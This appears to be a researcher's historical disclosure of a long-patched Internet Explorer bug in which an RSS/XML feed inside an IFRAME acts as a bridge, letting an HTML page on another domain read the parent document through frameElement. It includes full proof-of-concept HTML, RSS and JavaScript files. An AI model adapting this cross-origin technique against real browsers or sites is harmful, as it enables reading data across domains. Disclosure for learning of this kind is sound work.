The same frameElement leak that works with XAML also works with an RSS/XML file. Loading an XML feed inside an IFRAME and clicking a link in it that points to a different-domain HTML page gives that HTML access to frameElement and through it, the parent document. The XML acts as an origin-neutral bridge, just like XAML.
index.html:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_XML_FEEDS_frameElement</title></head>
<body>
<center>
<font face="Tahoma" size="2">
<h1>xDom_XML_FEEDS_frameElement</h1>
Very simple crossDomain using a xml file as a "bridge" to get the frameElement:<br /><br />
</center>
1) Load an <b>xml</b> inside an IFRAME. <font color="red">It doesn't matter if it is or not in a different domain</font>.<br />
2) That xml has a link ("Please, click here to load...") to an HTML <u>in a different domain</u>. Click on it.<br />
3) The HTML is able to read the frameElement with no restrictions at all.<br />
<br /><br />
<center>
<iframe src="I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml" width="400" height="200"></iframe><br /><br />
</center>
</font>
</body>
</html>I_CAN_BE_IN_ANY_DOMAIN_FEEDS.xml:
<rss version="2.0">
<channel>
<title>Please, click here to load a file located in a different domain</title>
<link>http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html</link>
</channel>
</rss>I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html:
<script language="JavaScript">
alert(frameElement.ownerDocument.body.outerHTML);
</script>IE’s feed viewer renders RSS/XML files with clickable links. When a link in a feed navigates the IFRAME to an HTML page on a different domain, the origin context from the XML isn’t correctly carried over to the new document, leaving frameElement accessible. This is the XML counterpart to the XAML variant found the same day.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.